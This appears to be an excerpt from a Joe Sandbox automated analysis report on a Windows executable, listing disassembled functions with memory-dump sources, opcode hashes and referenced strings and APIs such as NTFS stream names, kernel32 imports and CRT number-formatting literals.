                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                        • Instruction ID: 32eb3ef7f05ab90e0ebb09f53edacea3ba6e15af9f6539d95ac483edd11a1d9a
                                                                                        • Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                        • Instruction Fuzzy Hash: C332B472E085918BE718CF25D5506BC3BA1F7A5B48F058139EA5A87BC4EF3CE869C740
                                                                                        Function 00007FF6FE187288 Relevance: .3, Instructions: 294COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                        • Instruction ID: 77440548732f795ef4e7d84f25594f4663a73ebe2a67ce41d289d08d40dd43b8
                                                                                        • Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                        • Instruction Fuzzy Hash: FEC18BB7F281908FE350CF6AE440A9D3BB1F39878CB515125EF69A3B09D639E645CB40
                                                                                        Function 00007FF6FE1A2D58 Relevance: .3, Instructions: 268COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                        • Instruction ID: 557ad07ce5d51b527a56837c03588ed8bc64be5999fc3e8d502589dfa59cff04
                                                                                        • Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                        • Instruction Fuzzy Hash: 4AA14373E4818246EB25CA26D4447FD2A81EBF1B44F054235EE6E877C6EE3CE889D300
                                                                                        Function 00007FF6FE19AF18 Relevance: .2, Instructions: 244COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                        • Instruction ID: af06a4cde0e9f831df26cb079ef1f0806e0dec9d91a89c9f48a4d86b74475d69
                                                                                        • Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                        • Instruction Fuzzy Hash: B5C11677E291E44DE302CBB6A4248FD3FB1E75E30DB4A4251EFA656B4ED5285201DB20
                                                                                        Function 00007FF6FE18A310 Relevance: .2, Instructions: 230COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID:
                                                                                        • API String ID: 190572456-0
                                                                                        • Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                        • Instruction ID: d0560f3a76d77e63af34ad175d523b3780227651dc30b0b8d08bfb1eec149850
                                                                                        • Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                        • Instruction Fuzzy Hash: D4910F62F1858196EB11CF2AD4516ED6B21FFA5B88F441131FF5E87B89EE38E646C300
                                                                                        Function 00007FF6FE19B534 Relevance: .2, Instructions: 181COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                        • Instruction ID: 7248d81ca72f140214642db65af8d26d7bf812407c02b83b3db55bdaf6d9d898
                                                                                        • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                        • Instruction Fuzzy Hash: DB613A63F085D549EB21CF7685008FD7FB1E7A9784B454132EEAA9368AEE3CE505CB10
                                                                                        Function 00007FF6FE1A21D0 Relevance: .1, Instructions: 137COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                        • Instruction ID: 3908e9e529f214a1db7aea94a12623dc752c796bb1023c770b4b209b69e4b4cd
                                                                                        • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                        • Instruction Fuzzy Hash: 8351E073E181514BE728CF2AA0147BD3B52FBE4B48F444135EA59876C9EE3DE549DB00
                                                                                        Function 00007FF6FE1A2AB0 Relevance: .1, Instructions: 112COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                        • Instruction ID: 1ca0d0910f7ab9ee4b4137fa58ba3083a1b7bc6417cc7e9e86c414c32459af84
                                                                                        • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                        • Instruction Fuzzy Hash: 8E31D2A2E085914BD718CE2795906BE7B91B7D4780F048139EF5AC3B81EE3CE055C700
                                                                                        Function 00007FF6FE19DC70 Relevance: .0, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                                                        • Instruction ID: 118b66d465a846eb5efcdb52d680f7976dce2da694b4100fea783c8acaf615f8
                                                                                        • Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                                                        • Instruction Fuzzy Hash: 65F0FE65F1C00B42FB68802A581933D18569BB1310FD4883DF13FC62CDFDADE8815209
                                                                                        Function 00007FF6FE1B3354 Relevance: .0, Instructions: 2COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                        • Instruction ID: 38aaadc824a44f066c8e88fedce7b6d6ca36ebf22ab4908d8c9332b0778b1b08
                                                                                        • Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                        • Instruction Fuzzy Hash: AAA00161E08842D0E745CB16E8A04B12A20BBA0700B502031F02DC15E4AE7CA4128204
                                                                                        Function 00007FF6FE18D7D0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                                        • API String ID: 3668304517-727060406
                                                                                        • Opcode ID: 9722f19d9730c17eaeca2eefbf6c05556aeae8c55d78850e8e2a1aeae63cce70
                                                                                        • Instruction ID: 2dca5259fa37506eda555c91edf7e38ddd851a005f951c396f20fae8e3d3e660
                                                                                        • Opcode Fuzzy Hash: 9722f19d9730c17eaeca2eefbf6c05556aeae8c55d78850e8e2a1aeae63cce70
                                                                                        • Instruction Fuzzy Hash: B741DA36F05B0599EB00CF66D4803E937A9FB98798F400136EA6D837A4EF38E159C344
                                                                                        Function 00007FF6FE1B2A10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                        • API String ID: 2565136772-3242537097
                                                                                        • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                        • Instruction ID: 1bde42bd04a3a15753a4b55bfbb5c2f10e5c1619892bd56892628a4175fa29da
                                                                                        • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                        • Instruction Fuzzy Hash: CF21EE64F19A5385EB55DB67E8555B52BA0AFE4B80F481435F92EC2BE0FF3CB449C200
                                                                                        Function 00007FF6FE196A0C Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                        • String ID: DXGIDebug.dll$UNC$\\?\
                                                                                        • API String ID: 4097890229-4048004291
                                                                                        • Opcode ID: 2db35b7fd120c14e1a3842301d791596da2df3f6a2df10038d8e32577e88f225
                                                                                        • Instruction ID: 05a10a7edc481aee13b3b798f2427b5eeab4eaf49d992f93fa38004e2e796e63
                                                                                        • Opcode Fuzzy Hash: 2db35b7fd120c14e1a3842301d791596da2df3f6a2df10038d8e32577e88f225
                                                                                        • Instruction Fuzzy Hash: FF12C222F09B4280EB10DB66D4441AD6B71EBE5B98F504236EB6D87BE9EF3CD549C340
                                                                                        Function 00007FF6FE1A6E80 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 204memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                                                        • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                        • API String ID: 2868844859-1533471033
                                                                                        • Opcode ID: b0a568968ba406e2562f5405558042a856f124114ebc2f236df8f8f8fbeda86d
                                                                                        • Instruction ID: 788e51f0876ae6c4c76205ad5f28489e8ac754d51282fdbf1fc3f4e9c45cec97
                                                                                        • Opcode Fuzzy Hash: b0a568968ba406e2562f5405558042a856f124114ebc2f236df8f8f8fbeda86d
                                                                                        • Instruction Fuzzy Hash: 29817F62F19A4285FB01DBA6D4401FD2B71AFA9B94F404135EE2D976EAFE38D50AC340
                                                                                        Function 00007FF6FE1BE650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                        • API String ID: 3215553584-2617248754
                                                                                        • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                        • Instruction ID: 5e3f56b4c28cf03e2cf16aca26512414fee8543b6811e768e5e84e669fea7ce2
                                                                                        • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                        • Instruction Fuzzy Hash: C341A072F09B4589E704CF26E8417E93BA4EBA8394F014536EE6D83B94EE3CD425C344
                                                                                        Function 00007FF6FE1AF390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                        • String ID: STATIC
                                                                                        • API String ID: 2845197485-1882779555
                                                                                        • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                        • Instruction ID: 892da3028adf5cd44320597d57179b4b4adcab2e8ecc41e2dd1bab7678f960a0
                                                                                        • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                        • Instruction Fuzzy Hash: 52315225F08A4246FB60DB13A9547BA6B91ABE9BD0F040434FD6D87BD5EE3CE4498740
                                                                                        Function 00007FF6FE1AAE90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
